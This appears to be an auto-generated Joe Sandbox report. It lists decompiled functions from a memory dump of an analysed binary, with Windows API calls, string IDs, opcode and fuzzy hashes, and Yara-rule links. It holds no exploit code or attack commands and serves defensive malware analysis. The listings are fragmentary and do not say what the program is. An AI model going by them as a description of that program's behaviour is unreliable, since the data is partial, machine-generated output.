                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT ref: 0040F561
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$free
                                                                                                                                                • String ID: g4@
                                                                                                                                                • API String ID: 2888793982-2133833424
                                                                                                                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                • free.MSVCRT ref: 0041747F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                • String ID: "
                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID: F^@
                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                • free.MSVCRT ref: 0040B201
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                • free.MSVCRT ref: 0040B224
                                                                                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                • free.MSVCRT ref: 00417425
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5